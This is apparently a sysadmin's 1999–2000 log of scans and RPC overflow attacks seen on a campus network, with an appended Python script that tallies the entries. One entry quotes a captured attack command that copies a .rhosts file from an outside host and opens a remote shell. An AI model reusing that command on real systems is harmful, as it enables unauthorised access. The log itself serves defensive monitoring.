Here are some of the attacks I have seen on our network.

Date/time  from (id:port)  attack/scan

99-10-23 15:07:22  12.31.99.208  scan snmp ports
99-10-23 21:54:07  198.138.182.2:2666  scan net for port 111 - portmapper port
99-10-23 23:24  38.27.152.11  port scan on DNS server.
99-10-24 05:57  208.23.84.81  scan net for port 111
06:20:22  login1.sol.no  telnet to port 23
99-10-24 06:39  160.85.128.2 (twins.zhwin.ch)  attack statmon2 port,
99-10-24 06:50  160.85.128.2 (twins.zhwin.ch)  attack CMSD port
99-10-24 06:57  208.23.84.81  scan net for port 111 - portmapper port
99-10-25 08:46  194.202.96.10  scan net for snmp ports.
99-10-25 23:53  194.90.176.98 (dune.ramat-negev.org.il)  ttdbserverd attack
99-10-26 04:01  195.7.48.28 (crmonitor.emcweb.ie)  SNMP network scan
99-10-26 09:43:22  194.202.96.10  scan net for snmp ports.
99-10-26 11:50:09  197.7.48.28 (crmonitor.emcweb.ie)  scan net for snmp ports
99-10-26 12:56:57  197.7.48.28 (crmonitor.emcweb.ie)  scan net for snmp ports
99-10-26 13:23:24  197.7.48.28 (crmonitor.emcweb.ie)  scan net for snmp ports
99-10-26 18:25:27  200.38.228.2:2666  1 syn packet to port 111 on local machine. Machine had been off for 1 wk prior to 99-10-26. No other packets to/from local mach. Other specific machines on campus also scanned, but not the local net.
99-10-26 20:40  216.165.154.100:887  probe of port 111 on server ace
99-10-26 21:39:35  192.217.153.6  probe of port 111 on server ace
99-10-27 07:11:28  197.7.48.28:1029 (crmonitor.emcweb.ie)  scan net for snmp ports
99-10-27 11:10:32  194.198.131.100:1586 (ws100.dafix.se)  scan net for snmp ports
99-10-27 17:34:05  203.35.9.8:2666 (presto.pis.com.au)  scan net for port 111 - portmapper port
99-10-27 19:52:40  200.244.19.2  scan net for port 111 - portmapper port
99-10-28 08:56:38  140.203.16.53:0 (it.nuigalway.ie)  scan ace for port 111 (syn only)
99-10-28 09:43:51  209.125.157.110 (mastermag.magnitudenetwork.net)  major port scan on prime
99-10-28 16:33:23  166.104.13.118:688 (ccfl.hanyang.ac.kr)  scan net for port 111 - portmapper port
99-10-28 16:35:15  207.155.178.36 (ts016d24.sto-ca.concentric.net)  attack via statmon ports to boss.
99-10-31 20:44:22  210.154.23.210 (redmoon.minato.co.jp)  scan ace for port 111
99-11-02 00:44:33  209.83.173.199 (pit07.mentora.com)  query port 111 on ace. telnet probes to ace.
99-11-02 01:11:55  207.106.6.12 (scott.ndepot.com)  query port 111 on ace.
99-11-02 10:54:06  24.93.117.179 (dhcp93117179.columbus.rr.com)  scan net for multiple ports
99-11-03 00:21:47  24.10.120.91 (cc36308-b.ewndsr1.nj.home.com)  scan net for port 111
99-11-03 00:43:17  208.152.103.92 (pm3-26.ppp92.webzone.net)  probe mountd, port 32785 on boss
99-11-03 07:07:34  148.134.30.1 (corp.dukepower.com)  probe snmp ports on net
99-11-04 12:11:33  194.198.131.100:1084 (ws100.dafix.se)  scan net for snmp ports
99-11-04 23:32:33  194.198.131.100:1084 (ws100.dafix.se)  scan net for snmp ports
99-11-05 01:00:01  205.216.98.2 (not.friend.ly.net)  scan ace portmapper port
99-11-05 03:04:42  194.198.131.100:1084 (ws100.dafix.se)  scan net for snmp ports
99-11-05 07:12:01  204.143.4.2 (ip.2.highspeed.net)  scan ace for multiple ports.
99-11-05 09:07:52  208.20.79.119 ()  scan net for port 111
99-11-05 19:18:29  204.29.160.17 (courses.ju.edu)  scan port 111 on ace
99-11-05 20:29:50  204.143.164.5 (linux.bboard.com)  scan port 111 on ace
99-11-06 17:11:23  205.216.98.240 (not.friend.ly.net)  scan ace for port 111
99-11-06 22:11:35  163.152.145.248:0 (mli.korea.ac.kr)  scan ace for port 111
99-11-06 22:21:58  205.198.37.140 (someone.corpcomm.net)  scan net for port 111
99-11-06 22:41:45  195.185.17.36:0 ()  scan net for port 111
99-11-07 01:23:45  202.238.79.97 (www.sonylife.co.jp)  ttdbserverd attack on boss
99-11-07 01:55:25  200.238.252.127 ()  connection in INGRIS lock port on ace(?)
99-11-07 01:55:37  131.230.73.140 (aviator.cwis.siu.edu)  probe net for port 111
99-11-07 04:09:57  138.253.48.245 ()  probe net for port 111
99-11-07 16:49:54  164.125.144.50 (vortex.phys.pusan.ac.kr)  probe net for port 111
99-11-07 20:05:05  210.230.185.130 (dns1.riecco.co.jp)  scan net for port 111
99-11-07 22:12:31  164.125.144.50 (vortex.phys.pusan.ac.kr)  scan net for port 111
99-11-07 17:48:15  205.216.98.240 (not.friend.ly.net)  scan ace for port 111
99-11-08 17:00:35  205.216.98.240 (not.friend.ly.net)  scan boss for port 111
99-11-09 23:41:30  130.39.27.5 (home.eng.lsu.edu)  portmap scan on ace
99-11-09 05:42:31  168.57.107.121 (79059890.rsh.mhmr.state.tx.us)  snmp probe
99-11-09 18:30:00  212.116.0.0 net (...gb)  dns attack on ace
99-11-10 02:09:58  168.57.107.121 (79059890.rsh.mhmr.state.tx.us)  snmp probe
99-11-10 04:05:49  141.223.41.2 (anyon.postech.ac.kr)  CMSD buff. overflow attack
99-11-12 10:53:38  208.176.152.70 (w070.z208176152.sjc-ca.dsl.cnc.net)  scan net for port 1111
99-11-13 22:57:52  208.19.238.100 (pn-dialkn1-36.primary.net)  port scan of freent
99-11-14 04:03:53  24.200.169.69 (modemcable069.169-200-24.mtl.mc.videotron.net)  scan port 111
99-11-14 15:39:08  195.121.193.156 (nm0412-1.dial.wxs.nl)  scan port 111 on ace
99-11-16 17:36:28  192.114.163.214 (from net.il.)  ports probe of net
99-11-17 13:58:10  192.114.163.214 (from net.il.)  scan net for various ports
99-11-17 23:32:15  139.78.94.217 (swan.ceatlabs.okstate.edu)  scan net ports 111 and 2222
99-11-18 11:22 thru 99-11-19 02:19  192.114.163.214 (from net.il.)  scan ports 161,21
99-11-19 05:53:53  128.134.189.253 (sng.co.kr)  scan net for port 111
99-11-19 08:38  192.114.163.214 (from net.il.)  scan ports 161
99-11-19 15:51:43  209.108.127.41 (?.netcom.net)  scan BRANDX for port, ftpd. Tried to create dir CCScanner943044918
99-11-20 05:19:36  212.57.148.36 (wizard.enter.com.ru)  use anon ftp to ace to get password file.
99-11-20 07:18:57  200.210.225.14 (Intranet.hack.com.br)  portmap probe of net
99-11-20 14:32:20  192.114.163.214 (from net.il.)  scan ports 161
99-11-21 06:28:35  206.62.104.55 (55-pool1.ras10.calan.agisdial.net)  probe ace for ports. Stupid probe of ftpd holes.
99-11-25 23:57  203.230.144.127 ()  probe of port 111 on ace
99-11-26 01:11:04  209.181.78.41 (www2.bihnsystems.com)  port 111 net probe.
99-11-26 04:31:09  192.215.107.134 (w3.design4.cerf.net)  port 111 net probe.
99-11-26 04:31:09  192.215.107.134 (w3.design4.cerf.net)  sadmind buffer overflow attack against prime.
99-11-27 01:12:34  24.112.49.46 (cr925828-a.lndn1.on.wave.home.com)  probe port 111 on net
99-11-27 10:18:48  208.2.77.217 ()  port scan of ace
99-11-27 13:06:25  200.223.112.241 (dl2-241.ssa.zaz.com.br)  port scan 111 of ace
99-11-27 18:34:28  195.83.64.108 (athena.ceat.univ-poitiers.fr)  net scan ports 98
99-11-28 19:37:45  168.188.58.84 ()  scan port 111 on ace
99-12-02 16:13:24  168.159.146.190 ()  port scan 161 on net.
99-12-05 01:40:50  209.98.163.187 ()  port scan of port 111 on net
99-12-05 02:22:00  147.46.42.90 (hyper.snu.ac.kr)  scan ports on DNS servers
99-12-05 15:52:49  38.27.213.127 (ip127.houston13.tx.pub-ip.psi.net)  port 111 scan on ace
99-12-06 00:04:07  200.230.111.102 ()  NETBUS and BACKORIFICE port scan of net.
99-12-09 15:24:24  216.35.132.6:2666 (lizzy.cyberhost.com.au)  scan ace for ingris lock port.
99-12-09 23:21:56  208.24.200.198:2792 (cm20824200198.laketravis.ispchannel.com)  scan ace for port 111
99-12-10 02:43:58  208.24.200.198:2792 (cm20824200198.laketravis.ispchannel.com)  scan ace for port 111
99-12-11 22:15:17  200.203.198.200 (pointer gzp.sysnet.com.br)  scan ace for port 111
99-12-11 22:17:03  216.102.107.60 (adsl-216-102-107-60.dsl.scrm01.pacbell.net)  scan net for port 98
99-12-11 23:52:49  24.26.85.46 (242685hfc46.tampabay.rr.com)  scan net for port 111
99-12-12 01:48:29  38.150.78.2 (emcon4.emconfm.com)  scan net for port 98
99-12-12 12:16:21  128.59.19.197 (pennstation.cs.columbia.edu)  scan net for port 111
99-12-12 18:35:46  212.106.211.178 ()  probes on ace, boss various ports
99-12-12 19:35:14  200.203.198.200 (gzp.sysnet.com.br)  scan ace for port 111
99-12-12 22:58:18  147.83.4.160 (mat014.eupvg.upc.es)  scan net for port 111
99-12-13 17:38:28  203.251.180.252 (bbs.tntnet.co.kr)  scan ports on ace
99-12-14 01:35:06  24.5.186.138 (cx363361-a.elcjn1.sdca.home.com)  scan net for port 111
99-12-15 17:55:49  210.116.148.6 (open.co.kr)  scan boss for port 111
99-12-16 16:20:42  210.116.149.6 (open.co.kr)  scan ace for port 111
99-12-17 01:41:35  144.167.69.133 (dhcp133.cs.ualr.edu)  scan ace for port 111
99-12-17 02:47:44  200.210.184.229 (dlp-0483.sts.uol.coastalway.com.br)  scan ace for port 111
99-12-17 16:44:04  212.106.211.245 ()  port scan of ace.
99-12-17 21:47:46  200.210.146.46 (dlp-0554.sts.uol.coastalway.com.br)  scan port 111 on ace
99-12-20 09:19:14  210.222.148.193 ()  scan port 111 on ace.
99-12-20 18:24:10  211.38.9.253:53 ()  scan port 111 on ace (FROM PORT 53)
99-12-20 19:40:17  203.231.182.65:53 ()  scan port 111 on ace (FROM PORT 53)
99-12-21 05:20:54  63.11.25.249 (1Cust249.tnt1.yakima.wa.da.uu.net)  scan ports on ace.
99-12-21 07:28:19  132.166.222.62 (applepie.saclay.cea.fr)  scan port 139 on net
99-12-22 23:08:19  210.102.130.154:53 (stone.chch-c.ac.kr)  scan port 111 on net
99-12-23 19:08:30  155.230.156.225 (rigel.kyungpook.ac.kr)  scan net for ports 1, 530, 111
99-12-24 11:19:57  210.183.196.234 ()  scan port 111 on ace
99-12-24 20:13:10  203.232.229.166:53 ()  scan port 111 on ace
99-12-25 01:06:01  203.231.182.65 ()  scan port 111 on ace
99-12-25 08:04:00  210.225.33.66 (nickname for 66.64.33.225.210.in-addr.arpa which is ns.artteknika.com)  scan net for port 111
99-12-25 13:01:20  210.225.33.66 (nickname for 66.64.33.225.210.in-addr.arpa which is ns.artteknika.com)  attack several machines with lockd overflow attack (/tmp/bob....)
99-12-25 13:12:24  62.252.132.115 (m115-mp1-cvx1a.ren.ntl.com)  access to INGRESLOCK port on several machines, followed by scans of ports 111 and high numbered ports such as 32814 and 33280
99-12-25 14:45:59  210.225.33.66 (nickname for 66.64.33.225.210.in-addr.arpa which is ns.artteknika.com)  scan machines for port 530
99-12-25 15:46:46  206.141.240.187 (dyn1-tnt1-187.indianapolis.in.ameritech.net)  scan net 132.234.4.x, followed by attack to pcnfsd port on topdog with cmd ......configuration.......blah....USERNAME.....cd ...cd ...cd .. .cd ...cd bin.PATH=.:$PATH.export PATH.csh -c "cd ...cd ...cd .. .cd usr.cd ucb.rcp bob@shell.foobar.com:.rhosts ~USERNAME." followed by packet to rshell port of USERNAME /bin/sh -i
99-12-26 05:19:42  192.146.226.11:53 ()  scan port 111 on ace
99-12-26 06:52:27  204.178.16.36 (ches-netmapper.research.bell-labs.com)  scan port 37502 on ace UDP with email addr in packet of ches@bell-labs.com
99-12-26 07:17:23  62.104.184.131 ()  scan port 722, 10752, 111, 179 on ace; mountd attack, strings contain "Privet ADMcrew" in packet.
99-12-13 09:13:50  212.27.52.136 (lyon1-52-136.dial.proxad.net)  scan port 137 on ace.
99-12-26 09:32:27  206.161.225.2 (columbia.digiweb.com)  scan port 111, 1524, 1067 on ace - CMSD attack. Packets have strings "root.IIE@foobar", "root.FJC@foober", etc. in them.
99-12-26 16:41:27  209.247.64.7 ()  scan net for port 37875
99-12-27 07:23:47  204.210.9.61 (dt020n3d.san.rr.com)  scan port 111 on ace.
99-12-27 11:51:32  209.207.141.157:2666 ()  scan net for port 111.
99-12-27 17:49:44  24.237.23.239:777 (cable-239-23-237-24.juneau.ak.net)  probe port 111 on ace
99-12-27 20:56:16  209.207.141.157:0 ()  scan net for port 109.
99-12-28 05:22:19  216.132.56.203 (ip203.trusolutions.com)  scan 132.235.17.106 for port 111
99-12-28 06:15:11  202.8.228.193 ()  scan ace, then net for SNMP ports. + others
99-12-28 12:54:18  12.32.192.68 ()  scan net for SNMP ports.
99-12-28 16:31:27  207.33.151.244 ()  scan net for port 111
99-12-28 15:31:16  140.254.61.124 (gsu.med.ohio-state.edu)  scan on net for port 111? Seems weird.
99-12-28 20:23:59  63.22.60.155 (2Cust27.tnt10.atl2.da.uu.net)  probe boss
99-12-29 08:29:09  194.183.200.103 (nickname for 103.0.200.183.194.in-addr.arpa kip03.mcom.fr)  probe ports 139 and 137 on ace.
99-12-29 12:47:53  210.226.176.178 ()  portmapper probe on ace.
99-12-29 15:55:xx  204.178.107.81 (meibak.medianext.com)  buffer overflow attack against ace.
99-12-29 16:18:29  210.226.176.178 ()  portmapper probe on ace, followed by attempted connection to port 1524
99-12-29 21:28:01  146.164.112.10 ()  scan net for port 1, 111
99-12-30 16:40:05  206.146.144.1 (riptide.WaveTech.net)  probe ports 23 and 111 on prime.
99-12-30 16:40:36  204.193.147.58 ()  bang on port 15 on prime with no success, then hit ports 111 followed by 32782 repeatedly (try for buffer overflow)
99-12-30 16:41:57  208.16.68.100 (famvid.com)  probe ports on boss, use admind overflow bug to break in, run inetd with trojan on port 15.
99-12-31 04:38:17  202.101.107.246 (qzbar53.qz.fj.cn)  probe ace and boss for various ports
99-12-31 09:15:26  206.161.225.2 (columbia.digiweb.com)  hit ports 1524 on ace, followed by lop of ports 111 then 1089... (calendar manager attack with signature of root.TFA@foobar in packet)
00-01-02 01:00:58  195.191.160.66 (dns1.teleposta.it)  portmapper scan against ace
00-01-02 01:17:22  200.188.12.251 (bh-tnt-01-251.horizontes.com.br)  attack ace - scan port 111, scan pcnfsd, try rhosts cmd against user, try putting line into .rhosts of lmachado@planetarium.com.br.
99-01-01 05:08:12  168.187.217.98 ()  probe portmap on ace.
00-01-02 01:28:52  24.239.21.177 (n06h1177.ex-pressnet.com)  scan port 137 on ace
00-01-02 01:51:20  209.239.131.101 (port-03-31.athens.eurekanet.com)  scan port 137 on ace
00-01-02 08:46:35  210.206.73.41 ()  scan portmapper on ace
00-01-02 13:01:22  203.232.129.19 ()  scan portmapper on ace and prime
99-01-02 13:32:41  38.38.3.73 (ip73.raleigh13.nc.pub-ip.psi.net)  probe ports 1083, 1090 on homeip
00-01-02 13:51:51  62.108.16.131 (node1083.a2000.nl)  scan net for port 111, buffer overflow against rpc program 100232 (sadmind) on boss.
00-01-03 03:26:01  203.231.182.65:53 ()  probe portmapper port on ace
00-01-03 11:24:03  210.206.73.41:824 ()  get portmap from ace
00-01-03 11:42:51  210.226.176.178:2666 ()  scan for port 111 on ace
00-01-03 12:36:31  193.94.205.210 (smile.kotisivupalvelu.fi)  scan port 111 on net
00-01-03 21:23:11  203.231.182.65:53 ()  probe portmapper port on boss
00-01-03 16:32:16  193.207.118.21 ()  probe export maps on boss - packets contain js0.marano.nettuno.it
00-01-04 08:56:23  199.217.207.66 (ftp.peabodygroup.com)  probe statmon port on ace.
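The entries above are hand-kept in a fixed "date time source[:port] (hostname) note" shape, so they can be tallied by the service each source was after. The parser and service keyword table below are an added example, not part of the original log; the sample lines are copied from the entries above, and the keyword-to-service mapping is my own approximation of how the author labels things.

```python
import re
from collections import Counter

# Constructed sample: eight entries copied from the log above, one per line.
SAMPLE_LOG = """\
99-10-23 21:54:07 198.138.182.2:2666 scan net for port 111 - portmapper port
99-10-24 06:39 160.85.128.2 (twins.zhwin.ch) attack statmon2 port,
99-10-25 23:53 194.90.176.98 (dune.ramat-negev.org.il) ttdbserverd attack
99-10-27 07:11:28 197.7.48.28:1029 (crmonitor.emcweb.ie) scan net for snmp ports
99-11-05 09:07:52 208.20.79.119 () scan net for port 111
99-11-26 04:31:09 192.215.107.134 (w3.design4.cerf.net) sadmind buffer overflow attack against prime.
99-12-20 18:24:10 211.38.9.253:53 () scan port 111 on ace (FROM PORT 53)
00-01-02 13:51:51 62.108.16.131 (node1083.a2000.nl) scan net for port 111, buffer overflow against rpc program 100232 (sadmind) on boss.
"""

# date, time (seconds optional, "xx" allowed), source[:port], optional "(host)", free-text note
ENTRY_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{1,2})\s+(?P<time>\d{2}:\d{2}(?::\w{2})?)\s+"
    r"(?P<src>\S+?)(?::(?P<sport>\d+))?\s+(?:\((?P<host>[^)]*)\)\s+)?(?P<note>.*)$"
)

# Keyword -> service label (assumed mapping); first match wins, so specific
# RPC daemon names are listed before the generic port-111/portmapper patterns.
SERVICES = [
    ("sadmind", "sadmind"), ("100232", "sadmind"), ("statmon", "statd"),
    ("cmsd", "cmsd"), ("calendar", "cmsd"), ("ttdb", "ttdbserverd"),
    ("lockd", "lockd"), ("mountd", "mountd"), ("pcnfsd", "pcnfsd"),
    ("snmp", "snmp/161"), ("161", "snmp/161"),
    ("portmap", "portmapper/111"), ("111", "portmapper/111"),
    ("1524", "ingreslock/1524"), ("ingr", "ingreslock/1524"),
    ("137", "netbios"), ("139", "netbios"),
]
ATTACK_WORDS = ("attack", "overflow", "break in", "trojan", "rhosts")

def parse_entry(line):
    """Return a dict for one log line, or None for lines that lack the date/time prefix."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    note = rec["note"].lower()
    rec["service"] = next((lbl for kw, lbl in SERVICES if kw in note), "other")
    rec["kind"] = "attack" if any(w in note for w in ATTACK_WORDS) else "scan"
    rec["sport"] = int(rec["sport"]) if rec["sport"] else None
    rec["host"] = rec["host"] or None   # "()" in the log means no reverse lookup
    return rec

def summarize(text):
    """Parse every line; tally (service, kind) pairs and hits per source address."""
    recs = [r for r in (parse_entry(l) for l in text.splitlines()) if r]
    by_target = Counter((r["service"], r["kind"]) for r in recs)
    by_source = Counter(r["src"] for r in recs)
    return recs, by_target, by_source
```

Running `summarize(SAMPLE_LOG)` on the eight sample lines puts three portmapper scans and two sadmind attacks at the top of `by_target`, which is the same picture the full log gives: port 111 sweeps dominate, with RPC daemon overflows following the sweeps.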